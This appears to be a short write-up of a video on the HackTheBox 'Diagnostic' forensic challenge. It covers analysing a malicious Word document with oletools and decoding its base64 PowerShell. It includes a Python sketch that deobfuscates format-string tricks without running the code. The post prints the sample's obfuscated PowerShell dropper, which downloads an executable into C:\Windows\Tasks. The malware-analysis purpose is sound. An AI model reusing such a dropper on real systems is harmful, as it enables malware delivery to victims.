Microsoft Office Word Document Malware Analysis | HackTheBox Diagnostic

We covered analyzing a sample Microsoft Office Word document using oletools to extract the relevant macros and links. The sample document contained a link that references a webpage containing JavaScript code. The JS code contained a base64-encoded PowerShell command that calls out to an external domain to retrieve an executable file. This was part of the HackTheBox Diagnostic forensic challenge.

Video Highlights

  • We used oleid and oleobj to analyze the Word document named layoff.doc
  • The document contained an external link which references a webpage that contained JavaScript
  • We used the ASCII table to convert char[58] and char[34] into their corresponding ASCII characters.
  • We then used CyberChef to decode the base64, which produced the following:

${f`ile} = ("{7}{1}{6}{8}{5}{3}{2}{4}{0}"-f'}.exe','B{msDt_4s_A_pr0','E','r…s','3Ms_b4D','l3','toC','HT','0l_h4nD')

&("{1}{2}{0}{3}"-f'ues','Invoke','-WebReq','t') ("{2}{8}{0}{4}{6}{5}{3}{1}{7}"-f '://au','.htb/2','h','ic','to','agnost','mation.di','/n.exe','ttps') -OutFile "C:\Windows\Tasks\$file"

  • We used PowerShell to decode the above into the challenge flag
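
The format-operator (-f) strings above can also be resolved statically, so the sample's PowerShell never has to run on the analysis machine. The sketch below is an added example, not code from the video or the challenge; its function names are hypothetical, and it assumes only single-quoted literal arguments with no nested expressions, as in the download line shown above.

```python
import re

# Typographic quotes that blog/PDF rendering substitutes for PowerShell's ' and ".
QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"',
                        "\u2018": "'", "\u2019": "'", "\u2032": "'"})

# ("template" -f 'arg0','arg1',...) with single-quoted literal arguments only.
FORMAT_EXPR = re.compile(
    r"""\(\s*"([^"]*)"\s*-f\s*('[^']*'(?:\s*,\s*'[^']*')*)\s*\)""", re.IGNORECASE)
ARG = re.compile(r"'([^']*)'")
PLACEHOLDER = re.compile(r"\{(\d+)\}")

# The download line from the decoded payload above, quotes normalized.
SAMPLE = r'''&("{1}{2}{0}{3}"-f'ues','Invoke','-WebReq','t') ("{2}{8}{0}{4}{6}{5}{3}{1}{7}"-f '://au','.htb/2','h','ic','to','agnost','mation.di','/n.exe','ttps') -OutFile "C:\Windows\Tasks\$file"'''


def build_string(match: re.Match) -> str:
    """Rebuild the literal one -f expression produces, without executing it."""
    template, args = match.group(1), ARG.findall(match.group(2))
    try:
        built = PLACEHOLDER.sub(lambda m: args[int(m.group(1))], template)
    except IndexError:
        return match.group(0)  # placeholder has no matching argument: leave as-is
    return '"' + built + '"'


def resolve_format_exprs(script: str) -> str:
    """Replace every simple -f expression in script with the string it builds."""
    return FORMAT_EXPR.sub(build_string, script.translate(QUOTES))


if __name__ == "__main__":
    # Prints the line with the cmdlet name and URL reassembled.
    print(resolve_format_exprs(SAMPLE))
```

Expressions the pattern does not recognize, or whose placeholders have no matching argument, are left unchanged so they stay visible for manual review.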

Video Walkthrough